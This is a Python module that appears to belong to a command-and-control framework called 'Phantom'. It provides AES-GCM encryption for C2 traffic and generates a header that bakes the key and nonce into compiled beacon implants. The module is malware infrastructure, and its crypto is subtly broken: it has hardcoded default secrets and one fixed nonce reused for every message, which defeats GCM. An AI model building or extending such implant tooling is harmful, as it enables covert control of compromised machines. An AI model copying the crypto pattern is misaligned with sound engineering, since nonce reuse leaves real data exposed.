"""Shared C2 encryption key material and authenticated encryption (AES-GCM)."""
import hashlib
import os
import base64
from cryptography.hazmat.primitives.ciphers.aead import AESGCM
from dotenv import load_dotenv

# Load environment variables
load_dotenv()

DEFAULT_AES_KEY = b"PhantomC2_SecretKey_32bytes_Long"
DEFAULT_AES_NONCE = b"PhntmNonce12"  # 12 bytes for GCM


def get_aes_key() -> bytes:
    key = os.getenv("PHANTOM_C2_KEY", "").encode()
    return key if len(key) == 32 else DEFAULT_AES_KEY


def get_aes_nonce() -> bytes:
    nonce = os.getenv("PHANTOM_C2_NONCE", "").encode()
    return nonce if len(nonce) == 12 else DEFAULT_AES_NONCE


def get_payload_token() -> str:
    return os.getenv("PHANTOM_PAYLOAD_TOKEN", "PhantomDefaultToken")


def encrypt_data(plaintext: str) -> str:
    """Encrypt plaintext with AES-256-GCM and return base64-encoded ciphertext."""
    try:
        aesgcm = AESGCM(get_aes_key())
        nonce = get_aes_nonce()
        # AESGCM.encrypt in cryptography library appends the tag to the ciphertext.
        ciphertext = aesgcm.encrypt(nonce, plaintext.encode(), None)
        return base64.b64encode(ciphertext).decode()
    except Exception:
        return ""


def decrypt_data(ciphertext_b64: str) -> str:
    """Decrypt base64-encoded AES-256-GCM ciphertext and return plaintext."""
    try:
        ciphertext = base64.b64decode(ciphertext_b64)
        aesgcm = AESGCM(get_aes_key())
        nonce = get_aes_nonce()
        # AESGCM.decrypt expects the tag to be at the end of the ciphertext.
        plaintext = aesgcm.decrypt(nonce, ciphertext, None)
        return plaintext.decode()
    except Exception:
        return ""


def crypto_fingerprint() -> str:
    """Stable hash of current key material (for rebuild detection)."""
    material = get_aes_key() + b"|" + get_aes_nonce()
    return hashlib.sha256(material).hexdigest()


def _bytes_to_c_array(data: bytes) -> str:
    return ", ".join(f"0x{b:02x}" for b in data)


def write_beacon_crypto_config(beacon_dir: str) -> str:
    """Generate crypto_config.h from environment for beacon compilation."""
    src_dir = os.path.join(beacon_dir, "src")
    os.makedirs(src_dir, exist_ok=True)
    path = os.path.join(src_dir, "crypto_config.h")
    key = get_aes_key()
    nonce = get_aes_nonce()
    content = f"""#pragma once
// Auto-generated by phantom.utils.c2_crypto — do not edit manually.
static const unsigned char AES_KEY[]   = {{ {_bytes_to_c_array(key)} }};
static const unsigned char AES_NONCE[] = {{ {_bytes_to_c_array(nonce)} }};
"""
    with open(path, "w", encoding="utf-8") as f:
        f.write(content)
    return path
